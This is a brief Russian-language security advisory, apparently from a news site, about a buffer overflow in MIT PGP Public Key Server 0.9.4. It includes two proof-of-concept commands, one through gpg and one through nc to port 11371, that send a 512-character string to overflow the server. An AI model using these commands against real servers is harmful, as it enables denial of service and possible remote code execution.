MIT PKS (Public Key Server) содержит буфер, который
каждый пользователь может переполнить, это
может привести к отказу в работе сервиса
или выполнению произвольных команд на
удаленной системе.

Эксплоит:

#gpg —search-keys `perl -e "print ‘A’x512"`

или

#echo -e "GET /pks/lookup?op=index&search=`perl -e "print
‘A’x512"`"| nc keyserver-host 11371

Уязвимая версия PGP Public Key Server version 0.9.4.

Оставить мнение